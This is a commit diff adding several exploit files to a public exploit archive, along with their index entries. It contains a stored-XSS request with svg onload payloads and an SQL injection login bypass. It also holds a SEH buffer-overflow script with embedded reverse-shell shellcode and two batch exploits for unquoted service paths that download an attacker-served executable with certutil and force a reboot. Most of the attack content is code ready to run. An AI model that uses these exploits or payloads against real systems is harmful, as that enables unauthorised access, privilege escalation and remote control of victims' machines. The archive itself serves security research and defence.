Content-Length: 316
|
||||
Origin: http://TARGET
|
||||
Connection: close
|
||||
Referer: http://TARGET/pandora_console/index.php?sec=gmodules&sec2=godmode/modules/manage_module_templates
|
||||
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
id_np=0&valid-pen=1%2C2%2C4%2C9%2C11%2C63%2C111%2C116%2C123%2C171%2C173%2C188%2C207%2C674%2C2021%2C2636%2C3375%2C3861%2C6486%2C6574%2C8072%2C10002%2C12356%2C13062%2C14988%2C19464%2C41112%2C52627%2C53526%2C&name=%3Csvg%2Fonload%3Dalert%281%29%3E&description=%3Csvg%2Fonload%3Dalert%281%29%3E&pen=&action_button=Create
|
30
exploits/php/webapps/49140.txt
Normal file
30
exploits/php/webapps/49140.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
# Exploit Title: Social Networking Site - Authentication Bypass (SQli)
|
||||
# Date: 2020-11-17
|
||||
# Exploit Author: gh1mau
|
||||
# Email: gh1mau.rulez@gmail.com
|
||||
# Team Members: Capt'N, muzzo, chaos689 | https://h0fclanmalaysia.wordpress.com/
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14601/social-networking-site-phpmysqli-full-source-code.html
|
||||
# Software Link: https://www.sourcecodester.com/download-code?nid=14601&title=Social+Networking+Site+in+PHP%2FMySQLi+with+Full+Source+Code
|
||||
# Software Release Date: November 17, 2020
|
||||
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)
|
||||
|
||||
Vulnerable File:
|
||||
----------------
|
||||
/signin_form.php
|
||||
|
||||
Vulnerable Code:
|
||||
-----------------
|
||||
Entry point:
|
||||
|
||||
line 7: $email=$_POST['email'];
|
||||
line 8: $password=$_POST['password'];
|
||||
|
||||
Exit point:
|
||||
line 10: $result = mysqli_query($con,"SELECT * FROM user WHERE email = '$email' and password='$password'");
|
||||
|
||||
Vulnerable Issue:
|
||||
-----------------
|
||||
Attacker could bypass the authentication using simple sqli login bypass payload
|
||||
|
||||
username: gh1mau@gh1mau.com
|
||||
password: ' or '1'='1
|
92
exploits/windows/local/49134.py
Executable file
92
exploits/windows/local/49134.py
Executable file
|
@ -0,0 +1,92 @@
|
|||
# Exploit Title: 10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)
|
||||
# Date: 2020-09-02
|
||||
# Exploit Author: Sectechs
|
||||
# Vendor Homepage: https://www.10-strike.com
|
||||
# Version: 8.65
|
||||
# Tested on: Windows 7 x86 SP1
|
||||
|
||||
import os
|
||||
import sys
|
||||
import struct
|
||||
import socket
|
||||
|
||||
|
||||
crash ="A"* 209
|
||||
|
||||
# jmp short 8
|
||||
# kali@root:msf-nasm_shell
|
||||
# nasm> jmp short 8
|
||||
Next_SE_Pointer = "\xeb\x06\x90\x90"
|
||||
# 61e8497a
|
||||
SE_Handler="\x7a\x49\xe8\x61"
|
||||
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.6.211 LPORT=5555 -f c -b "\x00" -e x86/alpha_mixed
|
||||
payload = (
|
||||
"\xdb\xc3\xd9\x74\x24\xf4\x5e\x56\x59\x49\x49\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
|
||||
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
|
||||
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
|
||||
"\x6c\x59\x78\x6d\x52\x43\x30\x53\x30\x75\x50\x33\x50\x4f\x79"
|
||||
"\x69\x75\x34\x71\x69\x50\x32\x44\x4e\x6b\x32\x70\x64\x70\x6c"
|
||||
"\x4b\x76\x32\x54\x4c\x4e\x6b\x31\x42\x66\x74\x6c\x4b\x72\x52"
|
||||
"\x74\x68\x44\x4f\x48\x37\x42\x6a\x34\x66\x76\x51\x79\x6f\x6c"
|
||||
"\x6c\x77\x4c\x65\x31\x53\x4c\x74\x42\x64\x6c\x77\x50\x39\x51"
|
||||
"\x38\x4f\x74\x4d\x66\x61\x38\x47\x59\x72\x48\x72\x52\x72\x63"
|
||||
"\x67\x6c\x4b\x66\x32\x56\x70\x6c\x4b\x43\x7a\x45\x6c\x6c\x4b"
|
||||
"\x30\x4c\x76\x71\x43\x48\x4b\x53\x62\x68\x45\x51\x4b\x61\x43"
|
||||
"\x61\x4c\x4b\x73\x69\x57\x50\x37\x71\x68\x53\x4e\x6b\x52\x69"
|
||||
"\x36\x78\x6d\x33\x46\x5a\x43\x79\x4e\x6b\x35\x64\x4c\x4b\x77"
|
||||
"\x71\x5a\x76\x75\x61\x6b\x4f\x4e\x4c\x4b\x71\x58\x4f\x46\x6d"
|
||||
"\x65\x51\x5a\x67\x66\x58\x79\x70\x63\x45\x6a\x56\x75\x53\x63"
|
||||
"\x4d\x6c\x38\x45\x6b\x53\x4d\x54\x64\x32\x55\x4b\x54\x52\x78"
|
||||
"\x6e\x6b\x71\x48\x71\x34\x77\x71\x5a\x73\x55\x36\x6e\x6b\x56"
|
||||
"\x6c\x50\x4b\x4e\x6b\x50\x58\x55\x4c\x36\x61\x78\x53\x6c\x4b"
|
||||
"\x54\x44\x4e\x6b\x65\x51\x5a\x70\x6d\x59\x71\x54\x36\x44\x67"
|
||||
"\x54\x73\x6b\x51\x4b\x51\x71\x50\x59\x50\x5a\x62\x71\x79\x6f"
|
||||
"\x4b\x50\x73\x6f\x51\x4f\x63\x6a\x4e\x6b\x55\x42\x58\x6b\x4e"
|
||||
"\x6d\x53\x6d\x45\x38\x65\x63\x74\x72\x35\x50\x55\x50\x53\x58"
|
||||
"\x62\x57\x31\x63\x37\x42\x61\x4f\x36\x34\x33\x58\x32\x6c\x53"
|
||||
"\x47\x31\x36\x73\x37\x4b\x4f\x49\x45\x68\x38\x4c\x50\x56\x61"
|
||||
"\x33\x30\x57\x70\x44\x69\x68\x44\x76\x34\x30\x50\x32\x48\x67"
|
||||
"\x59\x6d\x50\x50\x6b\x73\x30\x39\x6f\x59\x45\x32\x70\x72\x70"
|
||||
"\x72\x70\x70\x50\x71\x50\x52\x70\x31\x50\x70\x50\x33\x58\x6a"
|
||||
"\x4a\x36\x6f\x49\x4f\x6b\x50\x69\x6f\x38\x55\x4a\x37\x33\x5a"
|
||||
"\x43\x35\x43\x58\x4f\x30\x6f\x58\x66\x66\x4e\x33\x73\x58\x46"
|
||||
"\x62\x35\x50\x32\x35\x4c\x73\x6d\x59\x38\x66\x62\x4a\x72\x30"
|
||||
"\x50\x56\x36\x37\x71\x78\x7a\x39\x59\x35\x42\x54\x35\x31\x79"
|
||||
"\x6f\x4b\x65\x4b\x35\x39\x50\x52\x54\x54\x4c\x69\x6f\x30\x4e"
|
||||
"\x47\x78\x52\x55\x38\x6c\x61\x78\x4c\x30\x58\x35\x79\x32\x33"
|
||||
"\x66\x79\x6f\x4a\x75\x72\x48\x35\x33\x52\x4d\x71\x74\x53\x30"
|
||||
"\x4d\x59\x59\x73\x51\x47\x50\x57\x70\x57\x75\x61\x78\x76\x33"
|
||||
"\x5a\x76\x72\x73\x69\x51\x46\x48\x62\x6b\x4d\x70\x66\x6b\x77"
|
||||
"\x47\x34\x57\x54\x37\x4c\x57\x71\x46\x61\x6e\x6d\x32\x64\x46"
|
||||
"\x44\x44\x50\x79\x56\x65\x50\x37\x34\x73\x64\x56\x30\x52\x76"
|
||||
"\x33\x66\x62\x76\x67\x36\x32\x76\x42\x6e\x56\x36\x32\x76\x62"
|
||||
"\x73\x43\x66\x45\x38\x51\x69\x78\x4c\x37\x4f\x6b\x36\x49\x6f"
|
||||
"\x58\x55\x4c\x49\x39\x70\x62\x6e\x73\x66\x71\x56\x39\x6f\x76"
|
||||
"\x50\x55\x38\x35\x58\x6c\x47\x47\x6d\x45\x30\x79\x6f\x69\x45"
|
||||
"\x6d\x6b\x78\x70\x6c\x75\x4c\x62\x73\x66\x35\x38\x69\x36\x7a"
|
||||
"\x35\x6d\x6d\x4d\x4d\x39\x6f\x5a\x75\x67\x4c\x67\x76\x51\x6c"
|
||||
"\x45\x5a\x4f\x70\x69\x6b\x39\x70\x54\x35\x36\x65\x6d\x6b\x33"
|
||||
"\x77\x56\x73\x43\x42\x30\x6f\x72\x4a\x65\x50\x62\x73\x49\x6f"
|
||||
"\x68\x55\x41\x41")
|
||||
buffer = crash + Next_SE_Pointer + SE_Handler + "\x90" * 20 + payload + "\x90" * 200
|
||||
f=open("PoC6.txt","w")
|
||||
|
||||
f.write(buffer)
|
||||
f.close()
|
||||
'''
|
||||
----------------------------------
|
||||
| NEXT SEH Pointer |
|
||||
--|------ ESP | | < ------- A * 209
|
||||
| |--------------------------------- |
|
||||
| | SE_Handler ▲ | |
|
||||
| | #POP #POP #RET | | |
|
||||
| | -------------------------------| |
|
||||
| ▼ Stack
|
||||
|
|
||||
|
|
||||
|______ ► -------------------------
|
||||
| PAYLOAD | -------- ► call | KALI |
|
||||
__________________________
|
||||
|
||||
'''
|
24
exploits/windows/local/49141.txt
Normal file
24
exploits/windows/local/49141.txt
Normal file
|
@ -0,0 +1,24 @@
|
|||
#Exploit Title: EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path
|
||||
#Exploit Author : SamAlucard
|
||||
#Exploit Date: 2020-27-11
|
||||
#Vendor : SEIKO EPSON Corp
|
||||
#Version : EPSON_PM_RPCV4_06 8.0
|
||||
#Vendor Homepage : https://epson.com
|
||||
#Tested on OS: Windows 7 Pro
|
||||
|
||||
#Analyze PoC :
|
||||
==============
|
||||
C:\>sc qc EPSON_PM_RPCV4_06
|
||||
[SC] QueryServiceConfig CORRECTO
|
||||
|
||||
NOMBRE_SERVICIO: EPSON_PM_RPCV4_06
|
||||
TIPO : 10 WIN32_OWN_PROCESS
|
||||
TIPO_INICIO : 2 AUTO_START
|
||||
CONTROL_ERROR : 1 NORMAL
|
||||
NOMBRE_RUTA_BINARIO: C:\Program Files\Common Files\EPSON\EPW!3
|
||||
SSRP\E_S60RPB.EXE
|
||||
GRUPO_ORDEN_CARGA :
|
||||
ETIQUETA : 0
|
||||
NOMBRE_MOSTRAR : EPSON V3 Service4(06)
|
||||
DEPENDENCIAS :
|
||||
NOMBRE_INICIO_SERVICIO: LocalSystem
|
35
exploits/windows/local/49142.txt
Normal file
35
exploits/windows/local/49142.txt
Normal file
|
@ -0,0 +1,35 @@
|
|||
# Exploit Title: Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path
|
||||
# Discovery by: Emmanuel Lujan
|
||||
# Discovery Date: 2020-11-26
|
||||
# Vendor Homepage: https://www.acer.com/ac/en/US/content/home
|
||||
# Tested Version: 1.0.0.3
|
||||
# Vulnerability Type: Unquoted Service Path
|
||||
# Tested on OS: Windows 7 Home Premium x64
|
||||
|
||||
# Step to discover Unquoted Service Path:
|
||||
|
||||
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
|
||||
|
||||
GREGService GREGServ
|
||||
ice C:\Program Files (x86)\Acer\Registration\G
|
||||
REGsvc.exe Auto
|
||||
|
||||
# Service info:
|
||||
|
||||
C:\>sc qc GregService
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: GREGService
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : GREGService
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
#Exploit:
|
||||
|
||||
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
|
73
exploits/windows/local/49143.txt
Normal file
73
exploits/windows/local/49143.txt
Normal file
|
@ -0,0 +1,73 @@
|
|||
# Exploit Title: Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path
|
||||
# Discovery by: Jok3r
|
||||
# Discovery Date: 2020-09-14
|
||||
# Vendor Homepage: https://home.pearsonvue.com/
|
||||
# Software Link: https://vss.pearsonvue.com/VSSFiles/Documents/ENU_TCInstallGuide/Download_VTS_Installer.htm
|
||||
# Tested Version: 2.3.1911
|
||||
# Vulnerability Type: Unquoted Service Path
|
||||
# Tested on OS: Windows 10 Pro x64 es
|
||||
|
||||
#Description:
|
||||
|
||||
The Application Wrapper is the component that automates the Pearson VUE Testing System. The Wrapper is a scheduler that runs in the background on the test center’s server.
|
||||
VUEApplicationWrapper service has an unquoted service path vulnerability and insecure file permissions on "\Pearson VUE\" directory that allows to overwrite by everyone so that unauthorized local user can leverage privileges to VUEService user that has administrative rights.
|
||||
|
||||
# Detection of unquoted service path:
|
||||
|
||||
C:\Users\VUEService>wmic service get name, pathname, displayname, startmode| findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Pearson" |findstr /i /v """
|
||||
VUE Application Wrapper
|
||||
VUEApplicationWrapper C:\Pearson VUE\VUE
|
||||
Testing System\bin\VUEWrapper.exe
|
||||
Auto
|
||||
|
||||
C:\Users\VUEService>sc qc VUEApplicationWrapper
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: VUEApplicationWrapper
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Pearson VUE\VUE TestingSystem\bin\VUEWrapper.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : VUE Application Wrapper
|
||||
DEPENDENCIES : lanmanworkstation
|
||||
SERVICE_START_NAME : .\VUEService
|
||||
|
||||
|
||||
#Detection of insecure file permissions:
|
||||
|
||||
PS C:\Users\VUEService> Get-Acl -Path "c:\Pearson Vue\"
|
||||
|
||||
|
||||
Directory: C:\
|
||||
|
||||
|
||||
Path Owner Access
|
||||
---- ----- ------
|
||||
Pearson Vue BUILTIN\Administrators Everyone Allow FullControl...
|
||||
|
||||
|
||||
#Exploit code:
|
||||
|
||||
ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i"Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """"
|
||||
wmic service get name,pathname,displayname,startmode | findstr /i "Auto" |findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """
|
||||
sc qc VUEApplicationWrapper
|
||||
powershell.exe -ep bypass -nop -c "Get-Acl -Path 'c:\Pearson Vue\'"
|
||||
ECHO [+] Enumeration was completed successfully.
|
||||
::Create VUE.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell.
|
||||
::msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Your IP Address>LPORT=443 -f exe > VUE.exe
|
||||
ECHO [*] If you create VUE.exe under "\Pearson VUE\" directory with your privileges, you might be able to get VUEService user privileges after windows was rebooted.
|
||||
certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/VUE.exe "C:\PearsonVUE\VUE.exe"
|
||||
ECHO [*] Downloading VUE executable...
|
||||
PAUSE
|
||||
IF EXIST "C:\Pearson VUE\VUE.exe" (
|
||||
ECHO [+] The download was successful.
|
||||
) ELSE (
|
||||
ECHO [-] The download was unsuccessful.
|
||||
PAUSE
|
||||
)
|
||||
ECHO [!] If you continue, system will be rebooted.
|
||||
PAUSE
|
||||
shutdown /r /t 0
|
||||
::code end
|
44
exploits/windows/local/49144.bat
Normal file
44
exploits/windows/local/49144.bat
Normal file
|
@ -0,0 +1,44 @@
|
|||
# Exploit Title: Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path
|
||||
# Date: 2020-08-28
|
||||
# Exploit Author: Metin Yunus Kandemir
|
||||
# Vendor Homepage: https://www.intel.com/
|
||||
# Version: v5.2
|
||||
# Tested on: Windows 7
|
||||
# Source: https://www.totalpentest.com/post/intel-r-user-notification-service-unquoted-service-path-privilege-escalation
|
||||
|
||||
@ECHO OFF
|
||||
ECHO
|
||||
=======================================================================================================================
|
||||
ECHO INTEL(R) MANAGEMENT AND SECURITY APPLICATION USER NOTIFICATION SERVICE 5.2 - Unquoted Service Path Privilege Escalation
|
||||
ECHO
|
||||
=======================================================================================================================
|
||||
ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """"
|
||||
wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
|
||||
sc qc UNS
|
||||
ECHO [+] Your mandoroty level is:
|
||||
whoami /groups | findstr /B /C:"Mandatory Label"
|
||||
::Create Privacy.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell.
|
||||
::msfvenom -p windows/shell/reverse_tcp LHOST=<Your IP Address> LPORT=443 -f exe > Privacy.exe
|
||||
ECHO [?]
|
||||
ECHO [+] Enumeration was completed successfully.
|
||||
ECHO [?] If you create Privacy.exe under Intel directory with your privileges, you might be able to get SYSTEM reverse shell after windows was rebooted.
|
||||
PAUSE
|
||||
certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/Privacy.exe "C:\Program Files (x86)\Common Files\Intel\Privacy.exe"
|
||||
IF EXIST "C:\Program Files (x86)\Common Files\Intel\Privacy.exe" (
|
||||
ECHO [+] The download was successful.
|
||||
) ELSE (
|
||||
ECHO [-] The download was unsuccessful.
|
||||
PAUSE
|
||||
)
|
||||
ECHO [!] If you continue, system will reboot.
|
||||
PAUSE
|
||||
shutdown /r /t 0
|
||||
::code end
|
||||
|
||||
#Exploit:
|
||||
|
||||
A successful attempt would require the local user to be able to insert
|
||||
their code in the system root path undetected by the OS or other security
|
||||
applications where it could potentially be executed during application
|
||||
startup or reboot. If successful, the local user's code would execute with
|
||||
the elevated privileges of the application.
|
|
@ -11211,6 +11211,11 @@ id,file,description,date,author,type,platform,port
|
|||
49101,exploits/windows/local/49101.txt,"Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path",2020-11-25,"Luis Sandoval",local,windows,
|
||||
49108,exploits/multiple/local/49108.txt,"SAP Lumira 1.31 - Stored Cross-Site Scripting",2020-11-27,"Ilca Lucian Florin",local,multiple,
|
||||
49116,exploits/windows/local/49116.py,"Foxit Reader 9.0.1.1049 - Arbitrary Code Execution",2020-11-27,CrossWire,local,windows,
|
||||
49134,exploits/windows/local/49134.py,"10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)",2020-12-01,Sectechs,local,windows,
|
||||
49141,exploits/windows/local/49141.txt,"EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path",2020-12-01,SamAlucard,local,windows,
|
||||
49142,exploits/windows/local/49142.txt,"Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path",2020-12-01,"Emmanuel Lujan",local,windows,
|
||||
49143,exploits/windows/local/49143.txt,"Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path",2020-12-01,Jok3r,local,windows,
|
||||
49144,exploits/windows/local/49144.bat,"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path",2020-12-01,"Metin Yunus Kandemir",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -43349,3 +43354,16 @@ id,file,description,date,author,type,platform,port
|
|||
49124,exploits/hardware/webapps/49124.py,"ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure",2020-11-30,"Zagros Bingol",webapps,hardware,
|
||||
49125,exploits/windows/webapps/49125.py,"Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)",2020-11-30,"Óscar Andreu",webapps,windows,
|
||||
49126,exploits/hardware/webapps/49126.py,"Intelbras Router RF 301K 1.1.2 - Authentication Bypass",2020-11-30,"Kaio Amaral",webapps,hardware,
|
||||
49128,exploits/php/webapps/49128.txt,"TypeSetter 5.1 - CSRF (Change admin e-mail)",2020-12-01,"Alperen Ergel",webapps,php,
|
||||
49129,exploits/php/webapps/49129.txt,"Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload",2020-12-01,ThelastVvV,webapps,php,
|
||||
49130,exploits/php/webapps/49130.py,"Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting",2020-12-01,B3KC4T,webapps,php,
|
||||
49131,exploits/php/webapps/49131.txt,"Online Shopping Alphaware 1.0 - Error Based SQL injection",2020-12-01,"Moaaz Taha",webapps,php,
|
||||
49132,exploits/php/webapps/49132.py,"Pharmacy/Medical Store & Sale Point 1.0 - 'email' SQL Injection",2020-12-01,naivenom,webapps,php,
|
||||
49133,exploits/multiple/webapps/49133.py,"Setelsa Conacwin 3.7.1.2 - Local File Inclusion",2020-12-01,"Bryan Rodriguez Martin",webapps,multiple,
|
||||
49135,exploits/php/webapps/49135.txt,"Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS",2020-12-01,yunaranyancat,webapps,php,
|
||||
49136,exploits/php/webapps/49136.txt,"Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution",2020-12-01,"Saeed Bala Ahmed",webapps,php,
|
||||
49137,exploits/php/webapps/49137.txt,"LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting",2020-12-01,"Sagar Banwa",webapps,php,
|
||||
49138,exploits/php/webapps/49138.txt,"Medical Center Portal Management System 1.0 - 'login' SQL Injection",2020-12-01,"Aydın Baran Ertemir",webapps,php,
|
||||
49139,exploits/php/webapps/49139.txt,"Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020",2020-12-01,"Matthew Aberegg",webapps,php,
|
||||
49140,exploits/php/webapps/49140.txt,"Social Networking Site - Authentication Bypass (SQli)",2020-12-01,gh1mau,webapps,php,
|
||||
49145,exploits/multiple/webapps/49145.txt,"Tendenci 12.3.1 - CSV/ Formula Injection",2020-12-01,"Mufaddal Masalawala",webapps,multiple,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue